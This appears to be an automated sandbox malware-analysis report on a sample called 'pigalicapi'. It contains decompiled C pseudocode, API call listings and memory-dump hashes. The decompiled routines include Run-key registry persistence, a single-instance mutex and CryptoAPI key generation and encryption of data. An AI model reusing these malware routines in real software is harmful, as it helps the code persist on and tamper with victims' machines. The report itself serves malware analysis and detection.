                                                                                                                                                                                                                                                                                          • Instruction ID: 5a59fe48962482dc997a37d5c0ed7d0013e253906576cb4b19edba68c8a08fb2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87716a91232c7d4b55081c1f55d7f64912373dfad697bd4087df7a6950954879
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D451C774904209EFEB04CF94C998BEEBBB5EF48305F148559E505B7284D379AA80CFA5
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04006CF0() {
                                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                                                                                                                          				long _t21;
                                                                                                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                                                                                                          				char* _t26;
                                                                                                                                                                                                                                                                                          				char* _t30;
                                                                                                                                                                                                                                                                                          				char* _t32;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                                          				_v12 = 0x80000001;
                                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          					_v12 = 0x80000002;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                                                                          				_t32 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                          				_t21 = RegOpenKeyExA(_v12, _t32, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                                                          				if(_t21 == 0) {
                                                                                                                                                                                                                                                                                          					_v24 = 0x20;
                                                                                                                                                                                                                                                                                          					_v20 = 3;
                                                                                                                                                                                                                                                                                          					_t30 =  *0x4011890; // 0x4013fa6
                                                                                                                                                                                                                                                                                          					_t24 = RegQueryValueExA(_v16, _t30, 0,  &_v20,  &_v60,  &_v24); // executed
                                                                                                                                                                                                                                                                                          					_v28 = _t24;
                                                                                                                                                                                                                                                                                          					if(_v28 == 0) {
                                                                                                                                                                                                                                                                                          						_v5 = 1;
                                                                                                                                                                                                                                                                                          						_t26 =  *0x4011890; // 0x4013fa6
                                                                                                                                                                                                                                                                                          						RegDeleteValueA(_v16, _t26);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					RegCloseKey(_v16);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                                          0x04006cf6
                                                                                                                                                                                                                                                                                          0x04006cfa
                                                                                                                                                                                                                                                                                          0x04006d0a
                                                                                                                                                                                                                                                                                          0x04006d0c
                                                                                                                                                                                                                                                                                          0x04006d0c
                                                                                                                                                                                                                                                                                          0x04006d13
                                                                                                                                                                                                                                                                                          0x04006d25
                                                                                                                                                                                                                                                                                          0x04006d30
                                                                                                                                                                                                                                                                                          0x04006d38
                                                                                                                                                                                                                                                                                          0x04006d3a
                                                                                                                                                                                                                                                                                          0x04006d41
                                                                                                                                                                                                                                                                                          0x04006d56
                                                                                                                                                                                                                                                                                          0x04006d61
                                                                                                                                                                                                                                                                                          0x04006d67
                                                                                                                                                                                                                                                                                          0x04006d6e
                                                                                                                                                                                                                                                                                          0x04006d70
                                                                                                                                                                                                                                                                                          0x04006d74
                                                                                                                                                                                                                                                                                          0x04006d7e
                                                                                                                                                                                                                                                                                          0x04006d7e
                                                                                                                                                                                                                                                                                          0x04006d88
                                                                                                                                                                                                                                                                                          0x04006d88
                                                                                                                                                                                                                                                                                          0x04006d94

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,04013B88,00000000,000F003F,00000000), ref: 04006D30
                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,04013FA6,00000000,00000003,?,00000020), ref: 04006D61
                                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,04013FA6), ref: 04006D7E
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04006D88
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 647993726-3916222277
                                                                                                                                                                                                                                                                                          • Opcode ID: 7e3867fdce199c8a5bb6ff6aa161a31bc633291f878d7ee7a05f6acc28b5ac08
                                                                                                                                                                                                                                                                                          • Instruction ID: 88112219bc8656018e8fd12fe99521312711d887651bf4d09d45951e100356d5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e3867fdce199c8a5bb6ff6aa161a31bc633291f878d7ee7a05f6acc28b5ac08
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE114275D04208AFEB04DFE0D848BBEBBB8FB48304F148158EA00BB280D77D5A45CBA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04008370(intOrPtr _a4, long _a8, char _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v56;
                                                                                                                                                                                                                                                                                          				long _v60;
                                                                                                                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                                                                                                          				void* _t90;
                                                                                                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a16 < _a8) {
                                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t79 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          					_v16 = _t79;
                                                                                                                                                                                                                                                                                          					_t80 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          					_v12 = _t80;
                                                                                                                                                                                                                                                                                          					if(_v16 != 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                                          						_v24 = 0x1000;
                                                                                                                                                                                                                                                                                          						_v20 = 0x1000;
                                                                                                                                                                                                                                                                                          						_t85 = E04008800(_v16,  &_v24, _v12,  &_v20, 0x4013378, 0x94); // executed
                                                                                                                                                                                                                                                                                          						if(_t85 != 0) {
                                                                                                                                                                                                                                                                                          							_t21 = _a8 + 0x10; // 0x1010
                                                                                                                                                                                                                                                                                          							_v28 = _v20 + _t21;
                                                                                                                                                                                                                                                                                          							_t170 = _a16 - _v28;
                                                                                                                                                                                                                                                                                          							if(_a16 >= _v28) {
                                                                                                                                                                                                                                                                                          								_v40 = E04008770(_t170, 0xa);
                                                                                                                                                                                                                                                                                          								_v36 = E040087D0(0xffffffff);
                                                                                                                                                                                                                                                                                          								_t90 = VirtualAlloc(0, _a8, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          								_v32 = _t90;
                                                                                                                                                                                                                                                                                          								if(_v32 != 0) {
                                                                                                                                                                                                                                                                                          									_v44 = _a8;
                                                                                                                                                                                                                                                                                          									E04007B70(_v32, _a4, _a8);
                                                                                                                                                                                                                                                                                          									_t94 = E04008970(_v32,  &_v44, _v16, _v24); // executed
                                                                                                                                                                                                                                                                                          									if(_t94 != 0) {
                                                                                                                                                                                                                                                                                          										_v48 = _a12;
                                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v40, 4);
                                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v36, 4);
                                                                                                                                                                                                                                                                                          										_v60 = 0;
                                                                                                                                                                                                                                                                                          										_v56 = _v48;
                                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v60, 4);
                                                                                                                                                                                                                                                                                          										_v52 = _v48;
                                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v20, 4);
                                                                                                                                                                                                                                                                                          										E040085D0( &_v48, _v12, _v20);
                                                                                                                                                                                                                                                                                          										E04008650(_v36, _v52, _v48 - _v52, _v36);
                                                                                                                                                                                                                                                                                          										E040085D0( &_v48, _v32, _v44);
                                                                                                                                                                                                                                                                                          										 *_v56 = E040016F0(_a12 + 0xc, _v48 - _a12 + 0xc);
                                                                                                                                                                                                                                                                                          										_v8 = _v48 - _a12;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									VirtualFree(_v32, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_v16 != 0) {
                                                                                                                                                                                                                                                                                          						VirtualFree(_v16, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}






















                                                                                                                                                                                                                                                                                          0x04008376
                                                                                                                                                                                                                                                                                          0x04008381
                                                                                                                                                                                                                                                                                          0x040085c0
                                                                                                                                                                                                                                                                                          0x040085c6
                                                                                                                                                                                                                                                                                          0x040083b1
                                                                                                                                                                                                                                                                                          0x040083bf
                                                                                                                                                                                                                                                                                          0x040083c5
                                                                                                                                                                                                                                                                                          0x040083d6
                                                                                                                                                                                                                                                                                          0x040083dc
                                                                                                                                                                                                                                                                                          0x040083e3
                                                                                                                                                                                                                                                                                          0x040083f3
                                                                                                                                                                                                                                                                                          0x040083fa
                                                                                                                                                                                                                                                                                          0x0400841b
                                                                                                                                                                                                                                                                                          0x04008425
                                                                                                                                                                                                                                                                                          0x04008431
                                                                                                                                                                                                                                                                                          0x04008435
                                                                                                                                                                                                                                                                                          0x0400843b
                                                                                                                                                                                                                                                                                          0x0400843e
                                                                                                                                                                                                                                                                                          0x0400844e
                                                                                                                                                                                                                                                                                          0x0400845b
                                                                                                                                                                                                                                                                                          0x0400846b
                                                                                                                                                                                                                                                                                          0x04008471
                                                                                                                                                                                                                                                                                          0x04008478
                                                                                                                                                                                                                                                                                          0x04008481
                                                                                                                                                                                                                                                                                          0x04008490
                                                                                                                                                                                                                                                                                          0x040084a8
                                                                                                                                                                                                                                                                                          0x040084b2
                                                                                                                                                                                                                                                                                          0x040084bb
                                                                                                                                                                                                                                                                                          0x040084c8
                                                                                                                                                                                                                                                                                          0x040084da
                                                                                                                                                                                                                                                                                          0x040084e2
                                                                                                                                                                                                                                                                                          0x040084ec
                                                                                                                                                                                                                                                                                          0x040084f9
                                                                                                                                                                                                                                                                                          0x04008504
                                                                                                                                                                                                                                                                                          0x04008511
                                                                                                                                                                                                                                                                                          0x04008525
                                                                                                                                                                                                                                                                                          0x0400853c
                                                                                                                                                                                                                                                                                          0x04008550
                                                                                                                                                                                                                                                                                          0x04008576
                                                                                                                                                                                                                                                                                          0x0400857e
                                                                                                                                                                                                                                                                                          0x0400857e
                                                                                                                                                                                                                                                                                          0x0400858c
                                                                                                                                                                                                                                                                                          0x0400858c
                                                                                                                                                                                                                                                                                          0x04008478
                                                                                                                                                                                                                                                                                          0x0400843e
                                                                                                                                                                                                                                                                                          0x04008425
                                                                                                                                                                                                                                                                                          0x04008596
                                                                                                                                                                                                                                                                                          0x040085a3
                                                                                                                                                                                                                                                                                          0x040085a3
                                                                                                                                                                                                                                                                                          0x040085ad
                                                                                                                                                                                                                                                                                          0x040085ba
                                                                                                                                                                                                                                                                                          0x040085ba
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040085ad

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 040083BF
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 040083D6
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0400846B
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 040089BF
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: GetLastError.KERNEL32 ref: 040089C9
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 040089F8
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008A1F
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 04008A41
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptDestroyKey.ADVAPI32(00000000), ref: 04008A4E
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008A5A
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400858C
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 040085A3
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 040085BA
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,04008420,00000000,00001000,00000000), ref: 0400883B
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: GetLastError.KERNEL32 ref: 04008845
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008874
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 040088AF
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 040088CF
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 0400890C
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 0400892A
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptDestroyKey.ADVAPI32(?), ref: 04008937
                                                                                                                                                                                                                                                                                            • Part of subcall function 040087D0: QueryPerformanceCounter.KERNEL32(?), ref: 040087E7
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Virtual$Context$Acquire$AllocFree$DestroyErrorExportImportLast$CounterEncryptPerformanceQueryRelease
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 487564122-0
                                                                                                                                                                                                                                                                                          • Opcode ID: cd64014fca8a1fd3dedaf543264f396e97ee9f29ef2d2d9375146d60c3b71fee
                                                                                                                                                                                                                                                                                          • Instruction ID: 75e4ec9ffd75ad85335d37f2dbfda6536f989acb89096578b4a6032df118288e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd64014fca8a1fd3dedaf543264f396e97ee9f29ef2d2d9375146d60c3b71fee
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0711CB6D00208ABEB14EFA4D845FEEB7B4BB48305F14C519EA15B72C0E774EA44CB65
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E040012D0(CHAR* _a4) {
                                                                                                                                                                                                                                                                                          				CHAR* _v8;
                                                                                                                                                                                                                                                                                          				char* _v12;
                                                                                                                                                                                                                                                                                          				CHAR* _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                                                                          				long _t26;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                          					_v16 = _v8;
                                                                                                                                                                                                                                                                                          					_v12 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                                                          					while( *0x4014370 == 0) {
                                                                                                                                                                                                                                                                                          						_v20 = 0x80000001;
                                                                                                                                                                                                                                                                                          						if(( *(_v8 + 0x30c) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          							_v20 = 0x80000002;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                                          						_t26 = RegOpenKeyExA(_v20, _v12, 0, 0xf003f,  &_v24); // executed
                                                                                                                                                                                                                                                                                          						if(_t26 == 0) {
                                                                                                                                                                                                                                                                                          							_v28 = lstrlenA(_v16);
                                                                                                                                                                                                                                                                                          							RegSetValueExA(_v24, _v8 + 0x208, 0, 1, _v16, _v28); // executed
                                                                                                                                                                                                                                                                                          							RegCloseKey(_v24);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                                          0x040012d9
                                                                                                                                                                                                                                                                                          0x040012e0
                                                                                                                                                                                                                                                                                          0x040012e9
                                                                                                                                                                                                                                                                                          0x040012ec
                                                                                                                                                                                                                                                                                          0x040012f3
                                                                                                                                                                                                                                                                                          0x04001301
                                                                                                                                                                                                                                                                                          0x04001314
                                                                                                                                                                                                                                                                                          0x04001316
                                                                                                                                                                                                                                                                                          0x04001316
                                                                                                                                                                                                                                                                                          0x0400131d
                                                                                                                                                                                                                                                                                          0x04001337
                                                                                                                                                                                                                                                                                          0x0400133f
                                                                                                                                                                                                                                                                                          0x0400134b
                                                                                                                                                                                                                                                                                          0x04001368
                                                                                                                                                                                                                                                                                          0x04001372
                                                                                                                                                                                                                                                                                          0x04001372
                                                                                                                                                                                                                                                                                          0x0400137d
                                                                                                                                                                                                                                                                                          0x0400137d
                                                                                                                                                                                                                                                                                          0x040012fc
                                                                                                                                                                                                                                                                                          0x0400138d

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,0400C248,00000000,000F003F,00000000), ref: 04001337
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 04001345
                                                                                                                                                                                                                                                                                          • RegSetValueExA.KERNELBASE(00000000,-00000208,00000000,00000001,?,?), ref: 04001368
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04001372
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 0400137D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseOpenSleepValuelstrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3411147897-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 938b7cb6186ad2cb83b89a2b0749dbfdb9b9446470f7ced15d3d2a40044d04a4
                                                                                                                                                                                                                                                                                          • Instruction ID: 889d750eda8961b126f00a9021e235014b30ece64fb5bfebafecfaf2f158f27d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 938b7cb6186ad2cb83b89a2b0749dbfdb9b9446470f7ced15d3d2a40044d04a4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12210070A04309EBEB04CFE4C949BAEB7B4FB44301F108258E641BB280D779AE40DB91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 02B521F9
                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 02B5223B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.718905728.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2b51000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorHugeLastRead
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3239643929-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 0a4b64bd4e5d8b7f1e91adeb02e1c79f52fbeba7da385d0b474a1b23aaead8a6
                                                                                                                                                                                                                                                                                          • Instruction ID: 07443bcd8da31650c15e42d64a23012b211ce6bebdb163d09ffff92c4c610236
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a4b64bd4e5d8b7f1e91adeb02e1c79f52fbeba7da385d0b474a1b23aaead8a6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C819674A01219EFDB04CF94C894BAEBBB1FF88354F148198ED59AB351D734AA81CF90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04005E00() {
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				CreateMutexA(0, 0, "pigalicapi"); // executed
                                                                                                                                                                                                                                                                                          				return 0 | GetLastError() == 0x000000b7;
                                                                                                                                                                                                                                                                                          			}



                                                                                                                                                                                                                                                                                          0x04005e0c
                                                                                                                                                                                                                                                                                          0x04005e25

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,04003BEB), ref: 04005E0C
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,04003BEB), ref: 04005E12
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                          • String ID: pigalicapi
                                                                                                                                                                                                                                                                                          • API String ID: 1925916568-2184165135
                                                                                                                                                                                                                                                                                          • Opcode ID: ac3ade5f6374e6b3d28c260e8624ddfb09fc106c0a6a63d5b6af1bc4c66bd4e9
                                                                                                                                                                                                                                                                                          • Instruction ID: c9a096dff23d34124f73a3e8575822b5ba186ec69b5811b6053c60030017a183
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac3ade5f6374e6b3d28c260e8624ddfb09fc106c0a6a63d5b6af1bc4c66bd4e9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAC08C362883186BF2081B61ED4BB893A88C792E81F600030F30AEA0D0999968C08B16
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
